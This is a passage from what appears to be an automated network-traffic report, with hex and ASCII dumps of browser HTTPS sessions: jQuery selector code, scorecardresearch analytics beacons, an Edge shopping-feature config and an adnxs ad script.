6c 65 63 74 6f
                                Data Ascii: )){(f=ee.test(t)&&ve(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=E)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{if(d.cssSupportsSelector&&!CSS.supports("selecto
                                2024-05-27 06:42:45 UTC1378INData Raw: 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 61 29 7b 72 65 74 75 72 6e 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e
                                Data Ascii: "in e&&e.disabled===t}}function ye(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ve(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.
                                2024-05-27 06:42:45 UTC1378INData Raw: 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 53 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65
                                Data Ascii: ?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&S){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace
                                2024-05-27 06:42:45 UTC1378INData Raw: 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 52 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 45 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 28 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22
                                Data Ascii: [selected]").length||y.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+E+"-]").length||y.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||y.push("\\["+M+"*name"+M+"*="+M+"
                                2024-05-27 06:42:45 UTC1378INData Raw: 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75
                                Data Ascii: ntElement||e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)retu


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.44978318.244.18.384437196C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:45 UTC519OUTGET /b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:45 UTC657INHTTP/1.1 302 Found
                                Content-Length: 0
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                Location: /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                set-cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165; domain=.scorecardresearch.com; path=/; max-age=62208000
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 111f802abddccd55d219ff1635e1aa4a.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: 0nR7BQed94QvLzuWAPXS9Ii_Ba2YRCu22oFbTvWm8ZIuDl35Zr_QXA==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.44978218.244.18.384437196C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:45 UTC567OUTGET /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                Cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
                                2024-05-27 06:42:46 UTC327INHTTP/1.1 204 No Content
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 3caf29bae8aa1020b6ba57a71bbb0880.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: PHsYgWd66gRoKiAf_TjNC61dodISyLbDKp_HWQJKf77NBdIBOz2a5A==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.44979818.244.18.384438640C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:46 UTC566OUTGET /b?rn=1716792164814&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                Cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
                                2024-05-27 06:42:46 UTC435INHTTP/1.1 204 No Content
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:46 GMT
                                set-cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165; domain=.scorecardresearch.com; path=/; max-age=62208000
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 11c65b00bf7f76c861a15dcad5558b9c.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: 1yUkMCbzr0VajFnuYCeVZfdwJGjn7v_96v_g1-_UF7dH-O5OLORbig==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.44980613.107.246.404435780C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:47 UTC619OUTGET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1
                                Host: edgeassetservice.azureedge.net
                                Connection: keep-alive
                                Edge-Asset-Group: ArbitrationService
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:47 UTC638INHTTP/1.1 200 OK
                                Date: Mon, 27 May 2024 06:42:47 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 11989
                                Connection: close
                                Content-MD5: 2Sac1JgWnA2goeZEYMrzXg==
                                Last-Modified: Mon, 20 May 2024 18:05:48 GMT
                                ETag: "0x8DC78F77AA84B37"
                                x-ms-request-id: e28b2738-b01e-0018-3901-b04592000000
                                x-ms-version: 2017-07-29
                                x-ms-lease-status: unlocked
                                x-ms-lease-state: available
                                x-ms-blob-type: BlockBlob
                                x-ms-server-encrypted: true
                                x-azure-ref: 20240527T064247Z-16f669959b4k284257wnqd0qt800000002kg00000000h1hf
                                Cache-Control: public, max-age=604800
                                x-fd-int-roxy-purgeid: 69316365
                                X-Cache: TCP_MISS
                                Accept-Ranges: bytes
                                2024-05-27 06:42:47 UTC11989INData Raw: 7b 0d 0a 20 20 22 63 6f 6e 66 69 67 56 65 72 73 69 6f 6e 22 3a 20 33 32 2c 0d 0a 20 20 22 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 73 22 3a 20 5b 0d 0a 20 20 20 20 22 53 68 6f 72 65 6c 69 6e 65 50 72 69 76 69 6c 65 67 65 64 45 78 70 65 72 69 65 6e 63 65 49 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 43 4f 55 50 4f 4e 53 5f 43 48 45 43 4b 4f 55 54 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 4c 4f 57 45 52 5f 50 52 49 43 45 5f 46 4f 55 4e 44 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 42 49 4e 47 5f 53 45 41 52 43 48 22 2c 0d 0a 20 20 20 20 22 53 48 4f 50 50 49 4e 47 5f 41 55 54 4f 5f 53 48 4f 57 5f 52 45 42 41 54 45
                                Data Ascii: { "configVersion": 32, "PrivilegedExperiences": [ "ShorelinePrivilegedExperienceID", "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT", "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND", "SHOPPING_AUTO_SHOW_BING_SEARCH", "SHOPPING_AUTO_SHOW_REBATE


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.449815151.101.1.1084438640C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                TimestampBytes transferredDirectionData
                                2024-05-27 06:42:49 UTC297OUTGET /ast/ast.js HTTP/1.1
                                Accept: application/javascript, */*;q=0.8
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: acdn.adnxs.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:49 UTC558INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 125250
                                Server: nginx/1.18.0 (Ubuntu)
                                Content-Type: application/javascript
                                Last-Modified: Tue, 13 Feb 2024 18:28:18 GMT
                                ETag: "65cbb4c2-1e942"
                                Expires: Sat, 06 Apr 2024 04:44:15 GMT
                                Cache-Control: max-age=86402
                                Access-Control-Allow-Origin: *
                                Via: 1.1 varnish, 1.1 varnish
                                Accept-Ranges: bytes
                                Age: 75005
                                Date: Mon, 27 May 2024 06:42:49 GMT
                                X-Served-By: cache-lga21942-LGA, cache-ewr18140-EWR
                                X-Cache: HIT, HIT
                                X-Cache-Hits: 35, 0
                                X-Timer: S1716792169.498471,VS0,VE1
                                Vary: Accept-Encoding
                                2024-05-27 06:42:49 UTC1371INData Raw: 2f 2a 21 20 41 53 54 20 76 30 2e 36 31 2e 32 20 55 70 64 61 74 65 64 3a 20 32 30 32 34 2d 30 32 2d 31 33 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 69 66 28 74 5b 61 5d 29 72 65 74 75 72 6e 20 74 5b 61 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 61 5d 3d 7b 69 3a 61 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 61 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 63 3d 74 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 6e 2e 6f 28 65 2c 74 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                Data Ascii: /*! AST v0.61.2 Updated: 2024-02-13 */!function(e){var t={};function n(a){if(t[a])return t[a].exports;var r=t[a]={i:a,l:!1,exports:{}};return e[a].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,a){n.o(e,t)||Object.defineProper
                                2024-05-27 06:42:49 UTC1371INData Raw: 7d 7d 2c 22 6e 22 3a 7b 22 55 4e 44 45 46 49 4e 45 44 22 3a 22 75 6e 64 65 66 69 6e 65 64 22 2c 22 4f 42 4a 45 43 54 22 3a 22 6f 62 6a 65 63 74 22 2c 22 53 54 52 49 4e 47 22 3a 22 73 74 72 69 6e 67 22 2c 22 4e 55 4d 42 45 52 22 3a 22 6e 75 6d 62 65 72 22 7d 2c 22 65 22 3a 7b 22 49 45 22 3a 22 6d 73 69 65 22 2c 22 4f 50 45 52 41 22 3a 22 6f 70 65 72 61 22 7d 2c 22 70 22 3a 7b 22 4c 4f 41 44 45 44 22 3a 22 6c 6f 61 64 65 64 22 2c 22 49 4d 50 52 45 53 53 49 4f 4e 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 22 7d 2c 22 68 22 3a 7b 22 55 54 5f 42 41 53 45 22 3a 22 2f 75 74 2f 76 33 22 2c 22 49 4d 50 42 55 53 22 3a 22 69 62 2e 61 64 6e 78 73 2e 63 6f 6d 22 2c 22 49 4d 50 42 55 53 5f 53 49 4d 50 4c 45 22 3a 22 69 62 2e 61 64 6e 78 73 2d 73 69 6d 70 6c 65 2e 63 6f 6d
                                Data Ascii: }},"n":{"UNDEFINED":"undefined","OBJECT":"object","STRING":"string","NUMBER":"number"},"e":{"IE":"msie","OPERA":"opera"},"p":{"LOADED":"loaded","IMPRESSION":"impression"},"h":{"UT_BASE":"/ut/v3","IMPBUS":"ib.adnxs.com","IMPBUS_SIMPLE":"ib.adnxs-simple.com
                                2024-05-27 06:42:49 UTC1371INData Raw: 74 65 64 22 2c 22 4e 4f 5f 42 49 44 5f 4d 45 44 49 41 54 45 44 22 3a 22 61 64 4e 6f 42 69 64 4d 65 64 69 61 74 65 64 22 2c 22 52 45 51 55 45 53 54 5f 46 41 49 4c 22 3a 22 61 64 52 65 71 75 65 73 74 46 61 69 6c 75 72 65 22 2c 22 4e 4f 5f 42 49 44 22 3a 22 61 64 4e 6f 42 69 64 22 2c 22 44 45 46 41 55 4c 54 22 3a 22 61 64 44 65 66 61 75 6c 74 22 2c 22 45 52 52 4f 52 22 3a 22 61 64 45 72 72 6f 72 22 2c 22 43 4f 4c 4c 41 50 53 45 22 3a 22 61 64 43 6f 6c 6c 61 70 73 65 22 2c 22 42 41 44 5f 52 45 51 55 45 53 54 22 3a 22 61 64 42 61 64 52 65 71 75 65 73 74 22 7d 2c 22 73 22 3a 7b 22 41 52 52 41 59 22 3a 22 41 72 72 61 79 22 2c 22 53 54 52 49 4e 47 22 3a 22 53 74 72 69 6e 67 22 2c 22 46 55 4e 43 22 3a 22 46 75 6e 63 74 69 6f 6e 22 2c 22 4e 55 4d 22 3a 22 4e 75 6d
                                Data Ascii: ted","NO_BID_MEDIATED":"adNoBidMediated","REQUEST_FAIL":"adRequestFailure","NO_BID":"adNoBid","DEFAULT":"adDefault","ERROR":"adError","COLLAPSE":"adCollapse","BAD_REQUEST":"adBadRequest"},"s":{"ARRAY":"Array","STRING":"String","FUNC":"Function","NUM":"Num
                                2024-05-27 06:42:49 UTC1371INData Raw: 41 64 54 65 6c 65 6d 65 74 72 79 3d 31 22 29 7d 6e 2e 64 28 74 2c 22 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 62 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 29 29 2c 6e 2e 64 28 74 2c 22 63 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 29 29 2c 6e 2e 64 28 74 2c 22 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 29 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 64 28 74 2c 22 61 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 29 29 3b 76 61 72 20 61 3d 6e 28 38 29 2c 72 3d 6e 28 31 29 3b 63 6f 6e 73 74 20 69 3d
                                Data Ascii: AdTelemetry=1")}n.d(t,"d",(function(){return a})),n.d(t,"b",(function(){return r})),n.d(t,"c",(function(){return i})),n.d(t,"a",(function(){return o}))},function(e,t,n){"use strict";(function(e){n.d(t,"a",(function(){return i}));var a=n(8),r=n(1);const i=
                                2024-05-27 06:42:49 UTC1371INData Raw: 2e 69 6e 63 6c 75 64 65 73 28 22 2f 2f 6c 6f 63 61 6c 68 6f 73 74 22 29 29 29 7c 7c 61 2e 61 2e 73 6b 69 70 4c 6f 67 67 69 6e 67 7d 6c 6f 67 28 74 2c 7b 69 64 3a 6e 7d 3d 7b 7d 29 7b 63 6f 6e 73 74 20 6f 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 61 2e 61 2e 67 65 74 53 65 73 73 69 6f 6e 44 61 74 61 28 29 29 2c 61 2e 61 2e 67 65 74 50 6c 61 63 65 6d 65 6e 74 44 61 74 61 28 6e 29 29 2c 74 29 2c 7b 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 7d 29 3b 74 68 69 73 2e 73 6b 69 70 4c 6f 67 67 69 6e 67 28 29 7c 7c 28 65 2e 65 6e 76 2e 49 53 5f 44 45 56 3f 4f 62 6a 65 63 74 28 69 2e
                                Data Ascii: .includes("//localhost")))||a.a.skipLogging}log(t,{id:n}={}){const o=Object.assign(Object.assign(Object.assign(Object.assign({},a.a.getSessionData()),a.a.getPlacementData(n)),t),{timestamp:(new Date).getTime()});this.skipLogging()||(e.env.IS_DEV?Object(i.
                                2024-05-27 06:42:49 UTC1371INData Raw: 6f 6e 28 65 29 7b 69 66 28 61 3d 3d 3d 63 6c 65 61 72 54 69 6d 65 6f 75 74 29 72 65 74 75 72 6e 20 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 3b 69 66 28 28 61 3d 3d 3d 6f 7c 7c 21 61 29 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 29 72 65 74 75 72 6e 20 61 3d 63 6c 65 61 72 54 69 6d 65 6f 75 74 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 3b 74 72 79 7b 61 28 65 29 7d 63 61 74 63 68 28 74 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 74 68 69 73 2c 65 29 7d 7d 7d 28 65 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 74 68 69 73 2e 66 75 6e 3d 65 2c 74 68 69 73 2e 61 72 72 61 79 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 7d 72 2e 6e
                                Data Ascii: on(e){if(a===clearTimeout)return clearTimeout(e);if((a===o||!a)&&clearTimeout)return a=clearTimeout,clearTimeout(e);try{a(e)}catch(t){try{return a.call(null,e)}catch(t){return a.call(this,e)}}}(e)}}function f(e,t){this.fun=e,this.array=t}function m(){}r.n
                                2024-05-27 06:42:49 UTC1371INData Raw: 65 74 75 72 6e 20 72 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 2c 61 3d 30 3b 61 3c 32 35 36 3b 2b 2b 61 29 6e 5b 61 5d 3d 28 61 2b 32 35 36 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 73 75 62 73 74 72 28 31 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 3d 74 7c 7c 30 2c 72 3d 6e 3b 72 65 74 75 72 6e 5b 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 22 2d 22 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 22 2d 22 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 22 2d 22 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 72 5b 65 5b 61 2b 2b 5d 5d 2c 22 2d 22 2c 72 5b 65 5b 61
                                Data Ascii: eturn r}}},function(e,t){for(var n=[],a=0;a<256;++a)n[a]=(a+256).toString(16).substr(1);e.exports=function(e,t){var a=t||0,r=n;return[r[e[a++]],r[e[a++]],r[e[a++]],r[e[a++]],"-",r[e[a++]],r[e[a++]],"-",r[e[a++]],r[e[a++]],"-",r[e[a++]],r[e[a++]],"-",r[e[a
                                2024-05-27 06:42:49 UTC1371INData Raw: 64 20 30 3a 6e 2e 73 74 61 63 6b 29 2c 74 2e 74 79 70 65 3d 65 2e 74 79 70 65 2c 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 74 29 2c 28 6e 75 6c 6c 3d 3d 3d 28 72 3d 65 2e 64 65 62 75 67 44 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 63 61 75 73 65 29 3f 28 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 2d 2d 5c 78 33 65 20 43 61 75 73 65 64 20 62 79 3a 22 29 2c 65 3d 65 2e 64 65 62 75 67 44 61 74 61 2e 63 61 75 73 65 29 3a 65 3d 76 6f 69 64 20 30 7d 7d 7d 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 22
                                Data Ascii: d 0:n.stack),t.type=e.type,console.error(t),(null===(r=e.debugData)||void 0===r?void 0:r.cause)?(console.log("--\x3e Caused by:"),e=e.debugData.cause):e=void 0}}}console.groupEnd(),console.log("--------------------")}},function(e,t,n){"use strict";n.d(t,"
